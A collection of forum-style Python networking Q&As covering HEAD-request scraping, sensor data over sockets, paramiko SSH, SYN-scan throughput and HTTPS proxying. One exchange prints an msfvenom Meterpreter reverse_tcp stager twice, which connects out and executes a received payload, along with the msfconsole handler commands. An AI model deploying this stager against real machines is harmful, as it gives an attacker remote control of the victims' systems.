I don't know if I'm doing something wrong, but I'm 100% sure it's the Python script that brings down my Internet connection.
I wrote a Python script to scrape the header info of thousands of files, mainly the Content-Length, to get the exact size of each file using HEAD requests.
Sample code:
import urllib2

class HeadRequest(urllib2.Request):
    def get_method(self):
        return "HEAD"

response = urllib2.urlopen(HeadRequest("http://www.google.com"))
print response.info()
The thing is, after several hours of running, the script starts to throw "urlopen error timed out", and my Internet connection is down from then on. The connection always comes back immediately after I close the script. At first I thought the connection might just be unstable, but after several runs it turned out to be the script's fault.
I don't know why; should this be considered a bug? Or did my ISP ban me for doing such things? (I already set the program to wait 10 seconds between requests.)
BTW, I'm using a VPN; does that have something to do with this?
I'd guess that either your ISP or VPN provider is limiting you because of high-volume suspicious traffic, or your router or VPN tunnel is getting clogged up with half-open connections. Consumer internet is REALLY not intended for spider-type activities.
"the script starts to throw out urlopen error timed out"
We can't even begin to guess.
You need to gather data on your computer and include that data in your question.
Get another computer. Run your script. Is the other computer's internet access blocked also? Or does it still work?
If both computers are blocked, it's not your software, it's your provider. Update Your Question with this information, and how you got it.
If only the computer running the script is blocked, it's not your provider, it's your OS resources being exhausted. This is harder to diagnose because it could be memory, sockets or file descriptors. Usually it's sockets.
You need to find some ifconfig/ipconfig diagnostic software for your operating system. You need to update your question to state exactly what operating system you're using. You need to use this diagnostic software to see how many open sockets are cluttering up your system.
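If it does turn out to be socket exhaustion, one thing worth trying is to close every response explicitly and keep the loop alive when a single request fails. A rough sketch, assuming the loop looks roughly like the code in the question ('urls' is a placeholder for your list of file URLs):

import contextlib
import time
import urllib2

class HeadRequest(urllib2.Request):
    def get_method(self):
        return "HEAD"

def content_length(url):
    # Close the response explicitly so its socket is released right away
    # instead of lingering until garbage collection.
    with contextlib.closing(urllib2.urlopen(HeadRequest(url), timeout=30)) as response:
        return response.info().getheader("Content-Length")

for url in urls:  # 'urls' is a placeholder for your list of file URLs
    try:
        print url, content_length(url)
    except Exception as e:  # log the failure and keep going
        print url, "failed:", e
    time.sleep(10)  # the 10-second pause mentioned in the question

If the connection still drops even though the open-socket count stays flat, that points back at the provider or the VPN rather than the script.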
Related
Key points:
I need to send roughly 100 float values every 1-30 seconds from one machine to another.
The first machine reads those values from sensors connected to it.
The second machine listens for them and passes them to an HTTP server (nginx), a Telegram bot, and another program that sends email alerts.
How would you do this and why?
Please be accurate. This is the first time I've worked with sockets and with Python, but I'm confident I can do this. Just give me the crucial details, enlighten me!
A small portion (a few lines) of code would be appreciated if you think a part is delicate, but the main goal of my question is to see the big picture.
The main thing here is to decide on a connection design and to choose a protocol, i.e. whether you will keep a persistent connection to your server or connect each time new data is ready.
Then: will you use HTTP POST, WebSockets, or plain sockets? Will you rely exclusively on nginx, or will your data catcher be a separate service?
Relying on nginx would be the most secure way if other people will also be connecting to it to view sites, etc.
Write or reuse another server running on another port, for example another nginx process just for this. Then use SSL (i.e. HTTPS) with basic authentication to prevent anyone else from abusing the connection.
Then, on the client side, build a packet of all the data every x seconds (pickle.dumps(), JSON, or similar), connect to your port with your credentials, and send the packet.
A Python script can be waiting for it on the server side.
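A rough sketch of that client side (the URL, credentials, and read_sensors() are placeholders, and I'm assuming the requests library here; any HTTP client would do):

import time
import requests  # assumed available; the standard library would work too

URL = "https://collector.example.com:8443/readings"  # placeholder endpoint
AUTH = ("sensor-box", "secret")                       # HTTP basic auth credentials

def read_sensors():
    return [0.0] * 100  # placeholder for your real sensor-reading code

while True:
    payload = {"ts": time.time(), "values": read_sensors()}
    try:
        # HTTPS plus basic auth, as described above
        requests.post(URL, json=payload, auth=AUTH, timeout=10)
    except requests.RequestException as exc:
        print("send failed:", exc)  # keep sampling even if one send fails
    time.sleep(5)  # your "every x seconds"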
Or you can write a socket server from scratch in Python (not especially hard) to wait for your packets.
The caveat here is that you have to implement your own protocol and security, but you gain some other benefits: it is much easier to maintain a persistent connection if you want or need one. I don't think that is necessary, though, and the reconnect/recovery code can become bulky.
No, just wait on some port for a connection. The client must clearly identify itself (otherwise you instantly drop the connection), it must prove that it speaks your protocol, and then it sends the data.
Use SSL sockets so that you don't have to implement encryption yourself to protect the authentication data. You could even rely solely on pre-built keys for security and then send only the data.
Do not worry about speed. Sockets are handled by the OS, and on a Unix-like system you can connect as many times as you want, as often as you need; nothing short of a DoS attack will impact it much.
On Windows, it is better to use an existing server, because Windows sometimes does not release a socket in time, so you will be forced to wait or to work around this unfortunate behaviour (non-blocking sockets, SO_REUSEADDR, and then some flow control will be needed).
Since your data is small, you don't have to worry much about the server protocol. I would use HTTPS myself, but I would write my own lightweight server in Python or modify and run one of the examples from the internet. That's just me, though.
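For the write-your-own-server route, here is a minimal Python 3 sketch of waiting for packets on an SSL socket (the certificate files, port, and read-until-close framing are all assumptions):

import socket
import ssl

# Placeholder certificate/key pair; generate your own for the server.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.crt", keyfile="server.key")

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 9000))  # placeholder port
listener.listen(5)

while True:
    raw_conn, addr = listener.accept()
    try:
        conn = context.wrap_socket(raw_conn, server_side=True)
    except ssl.SSLError as exc:
        print("rejected", addr, exc)  # client did not complete the TLS handshake
        raw_conn.close()
        continue
    with conn:
        data = b""
        while True:  # read until the client closes the connection
            chunk = conn.recv(4096)
            if not chunk:
                break
            data += chunk
        print("received", len(data), "bytes from", addr)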
The simplest thing that could possibly work would be to take your N floats, convert them to a binary message using struct.pack(), and then send them via a UDP socket to the target machine (if it's on a single LAN you could even use UDP multicast, so multiple receivers could get the data if needed). Depending on your network, you can safely fit roughly 60 to 170 double-precision floats in a single UDP datagram.
This requires no application protocol, is easily debugged at the network level using Wireshark, is efficient, and makes it trivial to implement other publishers or subscribers in any language.
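A sketch of that approach (the addresses, port, and the fixed count of 100 doubles are assumptions):

import socket
import struct

N = 100                   # number of floats per message
FMT = "!%dd" % N          # network byte order, N double-precision floats (800 bytes)

# Sender: pack the floats and fire a single datagram (address is a placeholder).
def send_readings(values, addr=("192.168.0.50", 9999)):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(struct.pack(FMT, *values), addr)
    sock.close()

# Receiver: block until one datagram arrives and unpack it back into floats.
def receive_readings(port=9999):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("", port))
    data, sender = sock.recvfrom(2048)  # comfortably bigger than 100 doubles
    sock.close()
    return struct.unpack(FMT, data)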
I'm writing a script that uses paramiko to SSH onto several remote hosts and run a few checks. Some hosts are set up as fail-overs for others, and I can't determine which is in use until I try to connect. Upon connecting to one of these 'inactive' hosts, the host tells me that I need to connect to another 'active' IP and then closes the connection after n seconds. This appears to be written to the stdout of the SSH connection/session (i.e. it is not an SSH banner).
I've used paramiko quite a bit, but I'm at a loss as to how to get this output from the connection. exec_command will obviously give me stdout and stderr, but the host prints this message immediately upon connection, doesn't accept any other incoming requests/messages, and just closes after n seconds.
I don't want to have to wait until the timeout to move onto the next host and I'd also like to verify that that's the reason for not being able to connect and run the checks, otherwise my script works as intended.
Any suggestions as to how I can capture this output, with or without paramiko, are greatly appreciated.
I figured out a way to get the data; it was pretty straightforward, to be honest, albeit a little hackish. This might not work in other cases, especially if there is latency, but I could also be misunderstanding what's happening:
When the connection opens, the server spits out two messages: one saying it can't chdir to a particular directory, then a few milliseconds later another stating that you need to connect to the other IP. If I send a command immediately after connecting (it doesn't matter which command), exec_command interprets this second message as the response. So for now I have a solution to my problem, as I can check that string for a known message and change the flow of execution.
However, if what I describe is accurate, then this may not work in situations where there is too much latency and the 'test' command isn't sent before the server response has been received.
As far as I can tell (and I may be very wrong), there is currently no proper way to get the stdout stream immediately after opening the connection with paramiko. If someone knows a way, please let me know.
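For reference, a minimal sketch of the workaround described above (host, credentials, and the marker string are placeholders):

import paramiko

def is_active_host(host, user, password, marker="connect to"):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, username=user, password=password, timeout=10)
    try:
        # Run a harmless command right away; on the 'inactive' hosts the
        # server's own message comes back as this command's output.
        stdin, stdout, stderr = client.exec_command("true")
        banner = stdout.read().decode("utf-8", "replace")
        return marker not in banner
    finally:
        client.close()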
I have used msfvenom to create the following python payload:
import socket,struct
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('MY PUBLIC IP',3930))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930, and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port forwarded 3930 on the router. What am I doing wrong here?
This is the code I would use for a reverse TCP on Unix systems, given the details you've provided. However, I stumbled upon your post while searching for the same error, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but recently it has started to lag: it runs once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN rather than the LAN, except that there it doesn't even run the first time. Which ISP do you have? It may be entirely dependent on that.
import socket,struct
s=socket.socket(2,1)                 # AF_INET, SOCK_STREAM
s.connect(('IP ADDRESS',3930))
l=struct.unpack('>I',s.recv(4))[0]   # 4-byte big-endian length prefix
d=s.recv(l)
while len(d)<l:                      # keep reading until the full stage arrives
    d+=s.recv(l-len(d))
exec(d,{'s':s})
I've coded a small raw-packet SYN port scanner to scan a list of IPs and find out if they're online (btw, this is for Debian with Python 2.7).
The basic intention was simply to check whether some websites are reachable, and to speed that process up by first sending a raw SYN request (port 80), but I stumbled upon something.
Just for fun I started trying to find out how fast I could get with this (as far as I know the fastest) check technique, and it turns out that, even though I'm only sending raw SYN packets on one port and listening for responses on that same port (with tcpdump), connection reliability drops noticeably at about 1500-2000 packets/sec, and shortly thereafter almost all networking on the box starts blocking.
I thought about it, and if I compare this with, say, the packets/sec of torrent seeding/leeching, the scan speed is actually quite slow.
I have a few ideas why this happens but I'm not a professional and I have no clue how to check if I'm right with my assumptions.
Firstly, it could be that Linux networking has some internal port-forwarding machinery running that keeps the sending port open (maybe some feature of iptables?), because the script seems to be able to receive SYN-ACKs even with a closed source port.
If so, is it possible to prevent or bypass that in some fashion?
Another guess is that the Python library is simply too dumb to do proper raw packet handling, but that's unlikely because, as far as I know, it uses the kernel's own facilities for that.
Does anyone have a clue why that network blocking is happening?
What's the difference compared to torrent connections or anything else like that?
Do I have to send the packets in another way or anything?
Months ago I found out that this problem is well known as the c10k problem.
Among other things, it has to do with how the kernel allocates and processes TCP connections internally.
The only really efficient way to address it is to bypass the kernel TCP stack and implement various other low-level things yourself.
All the good approaches I know of work with low-level asynchronous implementations.
There are some good ways to deal with the problem, depending on the scale.
For further information I would recommend searching for the c10k problem.
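For what it's worth, here is a rough Python 3 sketch of the asynchronous idea using an ordinary non-blocking connect() scan instead of raw SYN packets (targets, port, and timeout are placeholders); real c10k-scale work typically goes further with epoll-based frameworks or kernel-bypass techniques:

import errno
import selectors
import socket
import time

def check_port(hosts, port=80, timeout=3.0):
    sel = selectors.DefaultSelector()
    results = {}
    for host in hosts:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(False)
        err = s.connect_ex((host, port))  # returns immediately
        if err not in (0, errno.EINPROGRESS):
            results[host] = False
            s.close()
            continue
        sel.register(s, selectors.EVENT_WRITE, host)

    deadline = time.time() + timeout
    while sel.get_map() and time.time() < deadline:
        for key, _ in sel.select(timeout=0.2):
            # Writable means the handshake finished; SO_ERROR says how it went.
            err = key.fileobj.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
            results[key.data] = (err == 0)
            sel.unregister(key.fileobj)
            key.fileobj.close()

    for key in list(sel.get_map().values()):  # anything left has timed out
        results[key.data] = False
        sel.unregister(key.fileobj)
        key.fileobj.close()
    return results

# Example (placeholder addresses):
# print(check_port(["93.184.216.34", "192.0.2.1"]))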
I'm working on a project that allows a user to redirect his browsing through a proxy. The system works like this - a user runs this proxy on a remote PC and then also runs the proxy on his laptop. The user then changes his browser settings on the laptop to use localhost:8080 to make use of that local proxy, which in turn forwards all browser traffic to the proxy running on the remote PC.
This is where I ran into HTTPS. I was able to get normal HTTP requests working fine and dandy, but as soon as I clicked on google.com, Firefox skipped my proxy and connected to https://google.com directly.
My idea was to watch for browser requests that say CONNECT host:443 and then use the Python ssl module to wrap that socket. This would give me a secure connection between the outer proxy and the target server. However, when I ran Wireshark to see what a browser request looks like before SSL kicks in, the traffic was already encrypted; it looks like the browser connects to port 443 directly, which explains why it bypassed my local proxy.
I would like to be able to handle HTTPS, as that would make for a complete browsing experience.
I'd really appreciate any tips that could push me in the right direction.
Well, after doing a fair amount of reading on proxies, I found out that my understanding of the problem was insufficient.
For anyone else that might end up in the same spot as me, know that there's a pretty big difference between HTTP, HTTPS, and SOCKS proxies.
HTTP proxies usually take a quick look at the HTTP headers to determine where to forward the whole request. These are quite easy to code on your own with some basic knowledge of sockets.
HTTPS proxies, on the other hand, have to work differently. They should either do the whole SSL dance on behalf of the client, or simply pass the traffic through unchanged; with the latter approach, however, the user's IP will be known. This is a wee bit more demanding when it comes to coding (see the sketch below).
SOCKS proxies are a whole different, albeit really cool, beast. They work on the 5th layer of the OSI model and, honestly, I have no clue where I would even begin creating one. They achieve both security and anonymity. However, I do know that a person can use SSH to start a SOCKS proxy on their machine; just read this: http://www.revsys.com/writings/quicktips/ssh-tunnel.html . That link also gave me the idea that it should be possible to drive SSH from a Python script to make it much more convenient.
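For the HTTPS case, a rough sketch of the 'pass the traffic through unchanged' option: answer the browser's CONNECT with 200 and then relay bytes blindly in both directions (this assumes the caller has already read the full CONNECT request up to the blank line and hands over the first line; there is no real error handling):

import select
import socket

def tunnel(client_sock, connect_line):
    # connect_line looks like: b"CONNECT www.example.com:443 HTTP/1.1"
    host, _, port = connect_line.split()[1].partition(b":")
    remote = socket.create_connection((host.decode(), int(port.decode() or "443")))
    client_sock.sendall(b"HTTP/1.1 200 Connection Established\r\n\r\n")
    try:
        while True:
            readable, _, _ = select.select([client_sock, remote], [], [], 60)
            if not readable:
                break  # idle timeout
            for s in readable:
                data = s.recv(4096)
                if not data:
                    return  # one side closed; tear the tunnel down
                (remote if s is client_sock else client_sock).sendall(data)
    finally:
        remote.close()
        client_sock.close()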
Hope this helps anyone with the same question as I had. Good luck!